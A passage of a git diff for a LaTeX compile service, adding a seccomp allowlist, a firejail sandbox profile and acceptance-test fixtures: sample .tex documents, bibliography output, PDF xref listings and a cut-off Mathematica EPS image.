"gettimeofday", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, { + "name": "epoll_pwait", + "action": "SCMP_ACT_ALLOW", + "args": [] + } + ] +} \ No newline at end of file diff --git a/services/clsi/synctex.profile b/services/clsi/synctex.profile new file mode 100644 index 0000000..577a901 --- /dev/null +++ b/services/clsi/synctex.profile @@ -0,0 +1,34 @@ +include /etc/firejail/disable-common.inc +include /etc/firejail/disable-devel.inc +# include /etc/firejail/disable-mgmt.inc ## removed in 0.9.40 +# include /etc/firejail/disable-secret.inc ## removed in 0.9.40 + +read-only /bin +blacklist /boot +blacklist /dev +read-only /etc +blacklist /home # blacklisted for synctex +read-only /lib +read-only /lib64 +blacklist /media +blacklist /mnt +blacklist /opt +blacklist /root +read-only /run +blacklist /sbin +blacklist /selinux +blacklist /src +blacklist /sys +read-only /usr + +caps.drop all +noroot +nogroups +net none +private-tmp +private-dev +shell none +seccomp +nonewprivs + + diff --git a/services/clsi/test/acceptance/fixtures/examples/asymptote/main.tex b/services/clsi/test/acceptance/fixtures/examples/asymptote/main.tex new file mode 100644 index 0000000..910cef5 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/asymptote/main.tex @@ -0,0 +1,117 @@ +\documentclass[12pt]{article} + +% Use this form to include EPS (latex) or PDF (pdflatex) files: +\usepackage{asymptote} + +% Use this form with latex or pdflatex to include inline LaTeX code by default: +%\usepackage[inline]{asymptote} + +% Use this form with latex or pdflatex to create PDF attachments by default: +%\usepackage[attach]{asymptote} + +% Enable this line to support the attach option: +%\usepackage[dvips]{attachfile2} + +\begin{document} + +% Optional subdirectory for asy files (no spaces): +\def\asydir{} + +\begin{asydef} +// Global Asymptote definitions can be put here. +import three; +usepackage("bm"); +texpreamble("\def\V#1{\bm{#1}}"); +// One can globally override the default toolbar settings here: +// settings.toolbar=true; +\end{asydef} + +Here is a venn diagram produced with Asymptote, drawn to width 4cm: + +\def\A{A} +\def\B{\V{B}} + +%\begin{figure} +\begin{center} +\begin{asy} +size(4cm,0); +pen colour1=red; +pen colour2=green; + +pair z0=(0,0); +pair z1=(-1,0); +pair z2=(1,0); +real r=1.5; +path c1=circle(z1,r); +path c2=circle(z2,r); +fill(c1,colour1); +fill(c2,colour2); + +picture intersection=new picture; +fill(intersection,c1,colour1+colour2); +clip(intersection,c2); + +add(intersection); + +draw(c1); +draw(c2); + +//draw("$\A$",box,z1); // Requires [inline] package option. +//draw(Label("$\B$","$B$"),box,z2); // Requires [inline] package option. +draw("$A$",box,z1); +draw("$\V{B}$",box,z2); + +pair z=(0,-2); +real m=3; +margin BigMargin=Margin(0,m*dot(unit(z1-z),unit(z0-z))); + +draw(Label("$A\cap B$",0),conj(z)--z0,Arrow,BigMargin); +draw(Label("$A\cup B$",0),z--z0,Arrow,BigMargin); +draw(z--z1,Arrow,Margin(0,m)); +draw(z--z2,Arrow,Margin(0,m)); + +shipout(bbox(0.25cm)); +\end{asy} +%\caption{Venn diagram}\label{venn} +\end{center} +%\end{figure} + +Each graph is drawn in its own environment. One can specify the width +and height to \LaTeX\ explicitly. This 3D example can be viewed +interactively either with Adobe Reader or Asymptote's fast OpenGL-based +renderer. To support {\tt latexmk}, 3D figures should specify +\verb+inline=true+. It is sometimes desirable to embed 3D files as annotated +attachments; this requires the \verb+attach=true+ option as well as the +\verb+attachfile2+ \LaTeX\ package. +\begin{center} +\begin{asy}[height=4cm,inline=true,attach=false,viewportwidth=\linewidth] +currentprojection=orthographic(5,4,2); +draw(unitcube,blue); +label("$V-E+F=2$",(0,1,0.5),3Y,blue+fontsize(17pt)); +\end{asy} +\end{center} + +One can also scale the figure to the full line width: +\begin{center} +\begin{asy}[width=\the\linewidth,inline=true] +pair z0=(0,0); +pair z1=(2,0); +pair z2=(5,0); +pair zf=z1+0.75*(z2-z1); + +draw(z1--z2); +dot(z1,red+0.15cm); +dot(z2,darkgreen+0.3cm); +label("$m$",z1,1.2N,red); +label("$M$",z2,1.5N,darkgreen); +label("$\hat{\ }$",zf,0.2*S,fontsize(24pt)+blue); + +pair s=-0.2*I; +draw("$x$",z0+s--z1+s,N,red,Arrows,Bars,PenMargins); +s=-0.5*I; +draw("$\bar{x}$",z0+s--zf+s,blue,Arrows,Bars,PenMargins); +s=-0.95*I; +draw("$X$",z0+s--z2+s,darkgreen,Arrows,Bars,PenMargins); +\end{asy} +\end{center} +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/asymptote/output.pdf b/services/clsi/test/acceptance/fixtures/examples/asymptote/output.pdf new file mode 100644 index 0000000..0b85562 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/asymptote/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/asymptote/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/asymptote/output.pdfxref new file mode 100644 index 0000000..de34f56 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/asymptote/output.pdfxref @@ -0,0 +1,81 @@ +1/0: uncompressed; offset = 123103 +2/0: uncompressed; offset = 123422 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 1084 +6/0: uncompressed; offset = 1244 +7/0: uncompressed; offset = 4001 +8/0: uncompressed; offset = 4155 +9/0: uncompressed; offset = 4297 +10/0: uncompressed; offset = 4933 +11/0: uncompressed; offset = 5309 +12/0: uncompressed; offset = 5498 +13/0: uncompressed; offset = 30250 +14/0: uncompressed; offset = 31471 +15/0: uncompressed; offset = 38404 +16/0: uncompressed; offset = 39046 +17/0: uncompressed; offset = 40166 +18/0: uncompressed; offset = 40906 +19/0: uncompressed; offset = 65560 +20/0: uncompressed; offset = 74702 +21/0: uncompressed; offset = 81705 +22/0: uncompressed; offset = 97182 +23/0: uncompressed; offset = 104117 +24/0: uncompressed; offset = 111195 +25/0: uncompressed; offset = 118571 +26/0: compressed; stream = 6, index = 0 +27/0: compressed; stream = 6, index = 1 +28/0: compressed; stream = 6, index = 2 +29/0: compressed; stream = 6, index = 3 +30/0: compressed; stream = 6, index = 4 +31/0: compressed; stream = 6, index = 5 +32/0: compressed; stream = 6, index = 6 +33/0: compressed; stream = 6, index = 7 +34/0: compressed; stream = 6, index = 8 +35/0: compressed; stream = 6, index = 9 +36/0: compressed; stream = 6, index = 10 +37/0: compressed; stream = 6, index = 11 +38/0: compressed; stream = 6, index = 12 +39/0: compressed; stream = 6, index = 13 +40/0: compressed; stream = 6, index = 14 +41/0: compressed; stream = 6, index = 15 +42/0: compressed; stream = 6, index = 16 +43/0: compressed; stream = 6, index = 17 +44/0: compressed; stream = 6, index = 18 +45/0: compressed; stream = 6, index = 19 +46/0: compressed; stream = 6, index = 20 +47/0: compressed; stream = 6, index = 21 +48/0: compressed; stream = 6, index = 22 +49/0: compressed; stream = 6, index = 23 +50/0: compressed; stream = 6, index = 24 +51/0: compressed; stream = 6, index = 25 +52/0: compressed; stream = 6, index = 26 +53/0: compressed; stream = 6, index = 27 +54/0: compressed; stream = 6, index = 28 +55/0: compressed; stream = 6, index = 29 +56/0: compressed; stream = 6, index = 30 +57/0: compressed; stream = 6, index = 31 +58/0: compressed; stream = 6, index = 32 +59/0: compressed; stream = 6, index = 33 +60/0: compressed; stream = 6, index = 34 +61/0: compressed; stream = 6, index = 35 +62/0: compressed; stream = 6, index = 36 +63/0: compressed; stream = 6, index = 37 +64/0: compressed; stream = 6, index = 38 +65/0: compressed; stream = 6, index = 39 +66/0: compressed; stream = 6, index = 40 +67/0: compressed; stream = 6, index = 41 +68/0: compressed; stream = 6, index = 42 +69/0: compressed; stream = 6, index = 43 +70/0: compressed; stream = 6, index = 44 +71/0: compressed; stream = 6, index = 45 +72/0: compressed; stream = 6, index = 46 +73/0: compressed; stream = 6, index = 47 +74/0: compressed; stream = 6, index = 48 +75/0: compressed; stream = 6, index = 49 +76/0: compressed; stream = 6, index = 50 +77/0: compressed; stream = 6, index = 51 +78/0: compressed; stream = 6, index = 52 +79/0: compressed; stream = 6, index = 53 +80/0: compressed; stream = 6, index = 54 +81/0: compressed; stream = 6, index = 55 diff --git a/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/bibliography.bib b/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/bibliography.bib new file mode 100644 index 0000000..5e796e0 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/bibliography.bib @@ -0,0 +1,9 @@ +@book{DouglasAdams, + title={The Hitchhiker's Guide to the Galaxy}, + author={Adams, Douglas}, + isbn={9781417642595}, + url={http://books.google.com/books?id=W-xMPgAACAAJ}, + year={1995}, + publisher={San Val} +} + diff --git a/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/main.tex b/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/main.tex new file mode 100644 index 0000000..2f032d6 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/main.tex @@ -0,0 +1,12 @@ +\documentclass{article} + +\usepackage[backend=biber]{biblatex} +\addbibresource{bibliography.bib} + +\begin{document} + +The meaning of life, the universe and everything is 42 \cite{DouglasAdams} + +\printbibliography + +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/output.bbl b/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/output.bbl new file mode 100644 index 0000000..48e803b --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/output.bbl @@ -0,0 +1,48 @@ +% $ biblatex auxiliary file $ +% $ biblatex version 1.5 $ +% $ biber version 0.9.3 $ +% Do not modify the above lines! +% +% This is an auxiliary file used by the 'biblatex' package. +% This file may safely be deleted. It will be recreated by +% biber or bibtex as required. +% +\begingroup +\makeatletter +\@ifundefined{ver@biblatex.sty} + {\@latex@error + {Missing 'biblatex' package} + {The bibliography requires the 'biblatex' package.} + \aftergroup\endinput} + {} +\endgroup + + +\refsection{0} + \entry{DouglasAdams}{book}{} + \name{labelname}{1}{}{% + {{}{Adams}{A\bibinitperiod}{Douglas}{D\bibinitperiod}{}{}{}{}}% + } + \name{author}{1}{}{% + {{}{Adams}{A\bibinitperiod}{Douglas}{D\bibinitperiod}{}{}{}{}}% + } + \list{publisher}{1}{% + {San Val}% + } + \strng{namehash}{AD1} + \strng{fullhash}{AD1} + \field{sortinit}{A} + \field{isbn}{9781417642595} + \field{title}{The Hitchhiker's Guide to the Galaxy} + \field{year}{1995} + \verb{url} + \verb http://books.google.com/books?id=W-xMPgAACAAJ + \endverb + \endentry + + \lossort + \endlossort + +\endrefsection +\endinput + diff --git a/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/output.pdf b/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/output.pdf new file mode 100644 index 0000000..a2e037e Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/output.pdfxref new file mode 100644 index 0000000..1f1ac2b --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/output.pdfxref @@ -0,0 +1,31 @@ +1/0: uncompressed; offset = 59313 +2/0: uncompressed; offset = 59561 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 734 +6/0: uncompressed; offset = 784 +7/0: uncompressed; offset = 913 +8/0: uncompressed; offset = 1028 +9/0: uncompressed; offset = 1528 +10/0: uncompressed; offset = 9787 +11/0: uncompressed; offset = 18282 +12/0: uncompressed; offset = 33607 +13/0: uncompressed; offset = 45579 +14/0: uncompressed; offset = 58005 +15/0: compressed; stream = 14, index = 0 +16/0: compressed; stream = 14, index = 1 +17/0: compressed; stream = 14, index = 2 +18/0: compressed; stream = 14, index = 3 +19/0: compressed; stream = 14, index = 4 +20/0: compressed; stream = 14, index = 5 +21/0: compressed; stream = 14, index = 6 +22/0: compressed; stream = 14, index = 7 +23/0: compressed; stream = 14, index = 8 +24/0: compressed; stream = 14, index = 9 +25/0: compressed; stream = 14, index = 10 +26/0: compressed; stream = 14, index = 11 +27/0: compressed; stream = 14, index = 12 +28/0: compressed; stream = 14, index = 13 +29/0: compressed; stream = 14, index = 14 +30/0: compressed; stream = 14, index = 15 +31/0: compressed; stream = 14, index = 16 diff --git a/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/output.run.xml b/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/output.run.xml new file mode 100644 index 0000000..4d8dc94 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/output.run.xml @@ -0,0 +1,84 @@ + + + + + + + + + + + + + + + + + + + + + + + + +]> + + + latex + + output.bcf + + + output.bbl + + + blx-compat.def + biblatex.def + numeric.bbx + standard.bbx + numeric.cbx + biblatex.cfg + english.lbx + + + + biber + + biber + output + + + output.bcf + + + output.bbl + + + output.bbl + + + output.bcf + + + bibliography.bib + + + diff --git a/services/clsi/test/acceptance/fixtures/examples/draft_legacy/frog.jpg b/services/clsi/test/acceptance/fixtures/examples/draft_legacy/frog.jpg new file mode 100644 index 0000000..5b889ef Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/draft_legacy/frog.jpg differ diff --git a/services/clsi/test/acceptance/fixtures/examples/draft_legacy/main.tex b/services/clsi/test/acceptance/fixtures/examples/draft_legacy/main.tex new file mode 100644 index 0000000..e3c77e1 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/draft_legacy/main.tex @@ -0,0 +1,25 @@ +\documentclass{article} + +\usepackage{graphics} + +\title{Your Paper} +\author{You} + +\begin{document} +\maketitle + +\begin{abstract} +Your abstract. +\end{abstract} + +\section{Introduction} + +This is the start of the document. + +\begin{figure}[ht] +\includegraphics[0,0][100,100]{frog.jpg} +\end{figure} + +This is the end of the document. + +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/draft_legacy/options.json b/services/clsi/test/acceptance/fixtures/examples/draft_legacy/options.json new file mode 100644 index 0000000..183ed4b --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/draft_legacy/options.json @@ -0,0 +1,3 @@ +{ + "draft": true +} \ No newline at end of file diff --git a/services/clsi/test/acceptance/fixtures/examples/draft_legacy/output.pdf b/services/clsi/test/acceptance/fixtures/examples/draft_legacy/output.pdf new file mode 100644 index 0000000..c85b128 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/draft_legacy/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/draft_legacy/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/draft_legacy/output.pdfxref new file mode 100644 index 0000000..eab8b42 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/draft_legacy/output.pdfxref @@ -0,0 +1,39 @@ +1/0: uncompressed; offset = 67338 +2/0: uncompressed; offset = 67606 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 790 +6/0: uncompressed; offset = 840 +7/0: uncompressed; offset = 975 +8/0: uncompressed; offset = 1083 +9/0: uncompressed; offset = 1578 +10/0: uncompressed; offset = 9881 +11/0: uncompressed; offset = 17868 +12/0: uncompressed; offset = 29906 +13/0: uncompressed; offset = 38400 +14/0: uncompressed; offset = 46656 +15/0: uncompressed; offset = 56198 +16/0: uncompressed; offset = 65682 +17/0: compressed; stream = 16, index = 0 +18/0: compressed; stream = 16, index = 1 +19/0: compressed; stream = 16, index = 2 +20/0: compressed; stream = 16, index = 3 +21/0: compressed; stream = 16, index = 4 +22/0: compressed; stream = 16, index = 5 +23/0: compressed; stream = 16, index = 6 +24/0: compressed; stream = 16, index = 7 +25/0: compressed; stream = 16, index = 8 +26/0: compressed; stream = 16, index = 9 +27/0: compressed; stream = 16, index = 10 +28/0: compressed; stream = 16, index = 11 +29/0: compressed; stream = 16, index = 12 +30/0: compressed; stream = 16, index = 13 +31/0: compressed; stream = 16, index = 14 +32/0: compressed; stream = 16, index = 15 +33/0: compressed; stream = 16, index = 16 +34/0: compressed; stream = 16, index = 17 +35/0: compressed; stream = 16, index = 18 +36/0: compressed; stream = 16, index = 19 +37/0: compressed; stream = 16, index = 20 +38/0: compressed; stream = 16, index = 21 +39/0: compressed; stream = 16, index = 22 diff --git a/services/clsi/test/acceptance/fixtures/examples/draft_mode/frog.jpg b/services/clsi/test/acceptance/fixtures/examples/draft_mode/frog.jpg new file mode 100644 index 0000000..5b889ef Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/draft_mode/frog.jpg differ diff --git a/services/clsi/test/acceptance/fixtures/examples/draft_mode/main.tex b/services/clsi/test/acceptance/fixtures/examples/draft_mode/main.tex new file mode 100644 index 0000000..643ed95 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/draft_mode/main.tex @@ -0,0 +1,37 @@ +\documentclass{article} +% Language setting +% Replace `english' with e.g. `spanish' to change the document language +\usepackage[english]{babel} + +% Set page size and margins +% Replace `letterpaper' with `a4paper' for UK/EU standard size +\usepackage[letterpaper,top=2cm,bottom=2cm,left=3cm,right=3cm,marginparwidth=1.75cm]{geometry} + +% Useful packages +\usepackage{amsmath} +\usepackage{graphicx} +\usepackage[colorlinks=true, allcolors=blue]{hyperref} + +\title{Your Paper} +\author{You} + +\begin{document} +\maketitle + +\begin{abstract} +Your abstract. +\end{abstract} + +\section{Introduction} + +This is the start of the document. + +\begin{figure}[h] + \centering + \includegraphics[width=0.3\textwidth]{frog.jpg} + \caption{\label{fig:frog}This frog was uploaded via the file-tree menu.} +\end{figure} + +This is the end of the document. + +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/draft_mode/options.json b/services/clsi/test/acceptance/fixtures/examples/draft_mode/options.json new file mode 100644 index 0000000..183ed4b --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/draft_mode/options.json @@ -0,0 +1,3 @@ +{ + "draft": true +} \ No newline at end of file diff --git a/services/clsi/test/acceptance/fixtures/examples/draft_mode/output.pdf b/services/clsi/test/acceptance/fixtures/examples/draft_mode/output.pdf new file mode 100644 index 0000000..182a9c3 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/draft_mode/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/draft_mode/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/draft_mode/output.pdfxref new file mode 100644 index 0000000..aa568c0 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/draft_mode/output.pdfxref @@ -0,0 +1,50 @@ +1/0: uncompressed; offset = 69708 +2/0: uncompressed; offset = 70038 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 867 +6/0: uncompressed; offset = 990 +7/0: uncompressed; offset = 1143 +8/0: uncompressed; offset = 1251 +9/0: uncompressed; offset = 1834 +10/0: uncompressed; offset = 10137 +11/0: uncompressed; offset = 18124 +12/0: uncompressed; offset = 31939 +13/0: uncompressed; offset = 40433 +14/0: uncompressed; offset = 48689 +15/0: uncompressed; offset = 58231 +16/0: uncompressed; offset = 67715 +17/0: compressed; stream = 16, index = 0 +18/0: compressed; stream = 16, index = 1 +19/0: compressed; stream = 16, index = 2 +20/0: compressed; stream = 16, index = 3 +21/0: compressed; stream = 16, index = 4 +22/0: compressed; stream = 16, index = 5 +23/0: compressed; stream = 16, index = 6 +24/0: compressed; stream = 16, index = 7 +25/0: compressed; stream = 16, index = 8 +26/0: compressed; stream = 16, index = 9 +27/0: compressed; stream = 16, index = 10 +28/0: compressed; stream = 16, index = 11 +29/0: compressed; stream = 16, index = 12 +30/0: compressed; stream = 16, index = 13 +31/0: compressed; stream = 16, index = 14 +32/0: compressed; stream = 16, index = 15 +33/0: compressed; stream = 16, index = 16 +34/0: compressed; stream = 16, index = 17 +35/0: compressed; stream = 16, index = 18 +36/0: compressed; stream = 16, index = 19 +37/0: compressed; stream = 16, index = 20 +38/0: compressed; stream = 16, index = 21 +39/0: compressed; stream = 16, index = 22 +40/0: compressed; stream = 16, index = 23 +41/0: compressed; stream = 16, index = 24 +42/0: compressed; stream = 16, index = 25 +43/0: compressed; stream = 16, index = 26 +44/0: compressed; stream = 16, index = 27 +45/0: compressed; stream = 16, index = 28 +46/0: compressed; stream = 16, index = 29 +47/0: compressed; stream = 16, index = 30 +48/0: compressed; stream = 16, index = 31 +49/0: compressed; stream = 16, index = 32 +50/0: compressed; stream = 16, index = 33 diff --git a/services/clsi/test/acceptance/fixtures/examples/epstopdf/image-eps-converted-to.pdf b/services/clsi/test/acceptance/fixtures/examples/epstopdf/image-eps-converted-to.pdf new file mode 100644 index 0000000..7b92690 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/epstopdf/image-eps-converted-to.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/epstopdf/image.eps b/services/clsi/test/acceptance/fixtures/examples/epstopdf/image.eps new file mode 100644 index 0000000..fb131b9 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/epstopdf/image.eps @@ -0,0 +1,6673 @@ +%!PS-Adobe-3.0 EPSF-1.2 +%%BoundingBox: 0 0 432 268 +%%HiResBoundingBox: 0 0 432 268 +%%Creator: (Wolfram Mathematica 8.0 for Linux x86 (64-bit) (February 23, 2011)) +%%CreationDate: (Monday, October 8, 2012)(15:03:46) +%%Title: Clipboard +%%DocumentNeededResources: font Times-Roman +%%DocumentSuppliedResources: font Times-Roman-MISO +%%+ font Mathematica2 +%%+ font Mathematica1 +%%DocumentNeededFonts: Times-Roman +%%DocumentSuppliedFonts: Times-Roman-MISO +%%+ Mathematica2 +%%+ Mathematica1 +%%DocumentFonts: Times-Roman +%%+ Times-Roman-MISO +%%+ Mathematica2 +%%+ Mathematica1 +%%EndComments +/p{gsave}bind def +/P{grestore}bind def +/g{setgray}bind def +/r{setrgbcolor}bind def +/k{setcmykcolor}bind def +/w{setlinewidth}bind def +/np{newpath}bind def +/m{moveto}bind def +/Mr{rmoveto}bind def +/Mx{currentpoint exch pop moveto}bind def +/My{currentpoint pop exch moveto}bind def +/X{0 rmoveto}bind def +/Y{0 exch rmoveto}bind def +/N{currentpoint 3 -1 roll show moveto}bind def +/L{lineto}bind def +/rL{rlineto}bind def +/C{curveto}bind def +/cp{closepath}bind def +/F{eofill}bind def +/f{fill}bind def +/s{stroke}bind def +/S{show}bind def +/tri{p 9 6 roll r 6 4 roll m 4 2 roll L L cp F P}bind def +/Msf{findfont exch scalefont[1 0 0 -1 0 0]makefont setfont}bind def +1 -1 scale 0 -267.698 translate +-35.28 -2.88 translate +[1 0 0 1 0 0 ] concat +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit + +%%MathematicaCell +%Cell[BoxData[ +% GraphicsBox[{{}, {}, +% {GrayLevel[0], LineBox[CompressedData[" +%1:eJw113dcTf8fB/B7697q7tW0KSoJWRnp/ba3rCR7kxmSzKy+KFlFvqSMjB++ +%ESqKrlVEKJoy2nvv3S/O+5x/7uPce8/n83m/nu+zeq7cOmeNBofDqeVyOH8+ +%2a0l/9EWydgK9V7d4EmZe47Cm8LwOycM2X1fGDzdYkfqz3L1024exbOfBoC3 +%r26ui2c5/R4EpUfSFFnDytWX/v2z/Q9yO+VvM84uo/8Hg9/5EpPBp8vUJbP/ +%fBMCXy8fN5GPKqPjn4DGhdnXo/JK1cKUG86jheEwxHn2wDHnSmm8Z7DcMeyV +%7+hStfni069rzZ7D73FreM8KSmj8KKiZGhB1z6dEHdRxdMqNl+C31zh+u20J +%zfcK1nC8d2oVFqsH/93egLor7NzkU0zzvwWPY/98uDG6WP2m1qxjhmhwtBjk +%dye/iNbzDkRHH6e5ny1Sz/k74XvY7J513WxUEa0vFhJ+vlgTkFOoztzzZ8AP +%YDckMqHAu5DWGwf9rDutaBhWqN72Z3nOn2DLwfSeGb8LaP2fobqXp8v54wVq +%RiMedJ1rPhpaFVA98XBvmqp6Y1q+evLfCRIgKtrukO+hfKovAa4/0ex0wDxf +%/We2xae/wuWhSVqYkEf1foM7E+x2fnPLU/8tJ+Ub9MHHQYN75FH9iZCe2ui9 +%4F2uuvuf5XRLghFBj47Yb8mlPJLAyiiZ11kvV71u7Z8tGcxC4sIeROZQPikQ +%nNGyS29ljvrPaLrBKXB/zgzOGJ0cyisVnGs38MYEZ6vr/gxXmwpxOW67tedl +%U35pMMcjofO/jVlq278DfoegKVuPNQVkUZ7f4RpHXT5wfJb67/I80mF2ZJu1 +%cWEm5fsDHKa6JZd5Z6o/xf3ZfoDBO+2sPYMyKe+fYGHW3z0pOUOt93eBv+DB +%/IdHm/ZkUP6/4Mi8AfcqumWo/w63+DfofvIPWuzxmzwy4HDdvBtr4n5RPRng +%XyQ/26D8RT4ZMPzRQcuhjj+pvgxocL11Ky/gB3llQtVuy7W2OelUbyYkKzUb +%upink18mhO8U4sXN36n+LKgLm1j3X0gaeWaB1zML89G1qZRHFmim+1ksHZ5K +%vtlgedzAUmNvCuWTDQ3HXh8c/iKZvLPBRX+wU01bEuWVA6+K352eiUnknwMT +%axKOmR9KpPxywHbtC6ejr75RP+RCoPeYCnfuN8ozF3oOWGKVjV+pP3LBe7L5 +%piz3BMo3Dxx73Vu6Niqe+iUPxjkazH/X8IXyzoM+e25rp+74TP2TD+LzNpol +%pXGUfz4kRp4W8dZ9pH7KhytWwuBOv2PJowD+O3xdbDv/PXkUQOigqX62cTHk +%UQAmpw6MmzEmmjwKID7AsmxD6BvyKAQn433ymWavyaMQ9Dj2C8ZeekkehfD2 +%tIXdFv0o8iiCLxaLbU3qItRn/noUgeSth6vXt3DyKAKT2d+7fgx+Qh7FUOYz +%5qzF8RDyKAazMPW0oKj75FEMtptcBlWtu0UeJTCxx4K8oZKr5FEChh625dcX +%+ZBHCdxdculc2bQ95FEK/jDse0aTGzAepXDat36zh6EPMB6lEOMyLXttSyAw +%HmXw0vl9VIrLLWA8yiDsQt/zKyvuA+NRBjv2/d43+GkIMB7lUHT/5ubmpifA +%eJTD2mtGW4vgKTAe5fB4Z5evQccigfGoAOVTaPVLiAKmngqY/6hX1yGyV8D4 +%VEBui2yWT9hrYOqrAGPprh6ey94C41UBT9Mc+z4XxABTbwVYR3y/ZB36Dhi/ +%Crh4w3aAYmUsMPVXgmNgbMYq+UdgPCvBzrn8foY6jvKohF1ulbIi58/A+FbC +%qfuxDgGKeMqnEmpM34d7FscD410J2DMwyigmgfKqgsnmb18fvPYVGP8qyP+i +%eXn3/m+UXxVk1g8+OnVhIjDnZxWU1nmvz7FOojyroIeBPsdSPxmY/qiCWTF9 +%JVibTPlWwzDfRG2DpBRg+qUaTjQei30Zmkp5V8O1LS5aQ/zSgOmfanAvvXnN +%fvd3yr8a7G59+7JjcTow/VQNMr7DyVn4gzxq4Oo/D/X5vX+SRw30CbVN8hT+ +%Io8aWFESNqam4hd51MCExLtuY1J/k0cN3LLSbRmxPIM8asBzeCet0MQM8qiB +%xasjHkZMySSPWoiyEMg7qTPJoxby2zPkrUOyyKMWLhklHVp0L4s8aiFlYNjQ +%vr2yyaMWTljpGO/5N5s8asG5x7V9qMghjzp4963x2KkTOeRRB5EuJi12Grnk +%UQeF/fc1B+3NJY+O/4+32L6lNpc86mCRzYR5UVvzyKMO9DZbrbtYlEce9WA1 +%w8COvzafPOoh3SfIODcznzzqwe12cr91SwvIox5SRvB2uKYXkEc98DhqF6lj +%IXnUw9beZyJtUgrJowFsrQ6d0ZpfRB4NYHrH/+TapCLyaIAuOL1mtn0xeTTA +%GuPw70VJxeTRABNkzUUqhxLyaACvueemlaeWkEcDOFnuMly9qJQ8GsFlgFfM +%gV+l5NEI+U+NetquLCOPRngeGBIYmFdGHo2wcvfdxR82lpNHI5zRh4MnK8vJ +%oxG4C3e46NhUkEcTNMd1Tw5wryCPJpi5wunA1TcV5NEEPv2vtpRoVwJzvWyC +%hNniq7emV5JHE+j1eBv69GwleTTBucifASNTKsmjGQ6uu2yt37WKPJph027d +%liWrqsijGZZWO1vp3K0ij2ZIWrG+uVtlFXk0w5uBsu6Bw6vJoxnEvr7uFw5W +%k0cLZAa39qx4X00eLdCw/9iod4oa8miBzg+mjuIvqiGPFni9sK/u26Aa8miB +%Al/97Y1lNeTRAv945ufdGFFLHi3Qpbvry89Ha8mjFbJ6eHq7xdeSRyu4t5vZ +%X+9SRx6t8HFCVbC9Ux15tMJJ19DlHmF15NEKBUP6rQJePXm0wrlbvnoec+rJ +%ow2GN6beXXKtnjzaIEQ7Qvmhop482mD5z+vvorGBPNrApmT4yTlnG8ijDfQq +%YhoOZjWQRxsIRxUOnz2kkTzaoelrk27YP43k0Q6orNB8m9ZIHu2w1HNA0X7L +%JvJoB0Mb7tisQ03k0Q4nnwiKeSlN5NEOrolmkc/6NZMHB0+MWM0dc6SZ6uFg +%7LMxG3Z/byYfDm6x7mLnOqiF6uOg79Tpd829WsiLgzNttkwMz2mBv+Wu5eC3 +%2QNna0Mr+XFw67ivTf0vtdL1gYPJni0OpnWt5MlBz/itIby5bZQHB1sbMyRR +%D9vIl4Mng7Y/Wydrp3w4+GOPlMvf2k7eHDwaGWJx6ks75cXF5DI/5+OGHGT8 +%ueh/JmX++ykcZPLj4nHJw1On9nKQ6QcujnPtZ5PxHweZPLmYMH6oV0QGB5n+ +%4OL7L1PajHW5yOTLRRvp2tM9J3OR6RcuvjN3mfxkHxeZvLnIyX8mKwzhItM/ +%XLR7Glv1NJ+LTP5c3Ou/b/LgbhrI9BMXh4UZzZ9nr4EMhwbKe4SeMfXWQMZD +%A9/FH4OwaA1kPDRwxL86ri1tGsh4aGBk9AfkjtBExkMDd7rFhH/boYlM/2ng +%4ATDJ1seaCLj0THvBndRdrEmMh4a2Du8LXiYOQ8ZDw18dd4yfPs6HjIeGmia 